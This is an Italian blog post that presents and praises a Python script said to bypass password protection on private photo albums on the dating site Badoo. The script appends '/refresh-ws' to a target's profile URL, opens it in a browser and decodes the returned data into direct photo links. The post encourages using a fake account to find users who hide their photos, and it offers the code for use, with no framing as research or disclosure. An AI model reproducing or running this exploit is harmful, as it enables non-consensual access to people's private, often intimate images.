Pistulune staminchiazza….capocchiova!

Una bella ragazza conduce una doppia vita, di giorno timida studentessa, di sera giovane modella che ama mostrare le sue bellezze per qualcuno. Badoo offre la possibilità di contattare chiunque e farsi contattare da chiunque, senza distinzione di sorta. C’è la possibilità di caricare video e immagini e mostrare di se anhe i più piccoli “segreti”.

C’è anche la possibilità di “nascondere” ciò che si decide di mostrare, infatti attraverso l’uso di una password, da consegnare al contatto di fiducia, si può proteggere il proprio book. Un gruppo di “hackers” ha scritto un codice attraverso il quale è possibile bypassare la password di protezione. Basta un account “fake”, un pò di pazienza nella ricerca della pagina del codice e tanta fantasia nel cercare contatti che proteggono password.

Il codice è scritto in Python:

#!/usr/bin/python
import time
import os
print """
***************************
****** Badoo Hack *********
***************************
****** By ^4st3r1X^ *******
***************************
"""
def urldecode():
decode = raw_input("inserisci il codice completo trovato sulla pagina web: \n>")
print "\n\nAttendi..."
print "Decodifica link in corso..."
sostit = decode.replace("\\","")
sostit2 = sostit.replace('"'," ")
sostit3 = sostit2.replace(":{","")
sostit4 = sostit3.replace("{ errno :0, data ","")
sostit5 = sostit4.replace("},","")
sostit6 = sostit5.replace("}","")
print "Decodifica link completata."
if sostit6.find("url") != -1:
print "Semplifico lettura link..."
sostit7 = sostit6.replace("url :", "url: ")
sostit8 = sostit7.replace("url","\nurl")
print "Semplificazione lettura link terminata."
print "Terminato."
print "\n\n________________ links _________________________"
print sostit8
print "_________________links _________________________\n\n"
else:
print "\n\n________________ links _________________________"
print sostit6
print "_________________links _________________________\n\n"
d = raw_input("\nSe hai gia' effettuato il login su http://badoo.com/ scrivi 'c'\naltrimenti se vuoi effettuare il login premi 'e': \n")
if d == "e":
login = "http://badoo.com/signin/?sold1=4v8lRnrMZ05bsDXwO1u.6_eJcFQhaW2m"
print "Apertura firefox in corso..."
os.popen("firefox %s &" % (login))
time.sleep(3)
hack = "/refresh-ws"
time.sleep(3)
link = raw_input("Inserisci il link dell' utente con le foto protette da password(Es. http://nick.badoo.com/Ur74jsm): ")
exploit = link+hack
if link.find("http://") != -1:
print "Apro firefox..."
time.sleep(2)
os.popen("firefox %s &" % (exploit))
time.sleep(3)
urldecode()
else:
print "\nurl non valido(Es. http://nick.badoo.com/Ur74jsm)\n"
urldecode()
if d == "c":
hack = "/refresh-ws"
link = raw_input("Inserisci il link del utente con le foto protette da password(Es. http://nick.badoo.com/Ur74jsm): ")
exploit = link+hack
if link.find("http://") != -1:
print "Apro firefox..."
time.sleep(2)
os.popen("firefox %s &" % (exploit))
time.sleep(3)
urldecode()
else:
print "\nurl non valido(Es. http://nick.badoo.com/Ur74jsm)\n"
urldecode()
while 1:
a = raw_input("scrivi 'esci' per uscire oppure 'r' per continuare ad usare il decodificatore di links: ")
if a.find("esci") != -1:
print "Uscita in corso"
exit()
if a.find("r") != -1:
hack = "/refresh-ws"
link = raw_input("Inserisci il link del utente con le foto protette da password(Es. http://nick.badoo.com/Ur74jsm): ")
exploit = link+hack
print "Apertura firefox in corso..."
time.sleep(1)
os.popen("firefox %s &" % (exploit))
time.sleep(3)
decode = raw_input("inserisci il codice completo trovato sulla pagina web: \n>")
print "\n\nAttendi..."
print "Decodifica link in corso..."
sostit = decode.replace("\\","")
sostit2 = sostit.replace('"'," ")
sostit3 = sostit2.replace(":{","")
sostit4 = sostit3.replace("{ errno :0, data ","")
sostit5 = sostit4.replace("},","")
sostit6 = sostit5.replace("}","")
print "Decodifica link completata."
if sostit6.find("url") != -1:
print "Semplifico lettura link..."
sostit7 = sostit6.replace("url :", "url: ")
sostit8 = sostit7.replace("url","\nurl")
print "Semplificazione lettura link terminata."
print "Terminato."
print "\n\n________________ links _________________________"
print sostit8
print "_________________links _________________________\n\n"
else:
print "\n\n________________ links _________________________"
print sostit6
print "_________________links _________________________\n\n"
else:
print "Sintassi errata.Scrivi 'esci' per uscire oppure 'r' per continuare ad usare il decodificatore di links."

Il codice è molto semplice di per se, ma geniale. L’uso di tale codice è da utilizzare attraverso un interprete Python, per chi usa Linux le cose sarebbero molto più semplici, per chi usa Windows altrettanto, ma con qualche “giro” in più da affrontare.

Fondamentalmente non è difficile l’uso del codice in se, e per una sorta di rispetto nei confronti di chi ha sicritto e pubblicato il codice stesso, eviterò la diffusione dell’esecuzione di tale codice. Il mio complimento va all’Hacker che ha scritto tale codice e ha scoperto la falla di Badoo. A tutt’oggi non so se il problema sia stato “fixato”.

Complimenti ^4st3r1X^.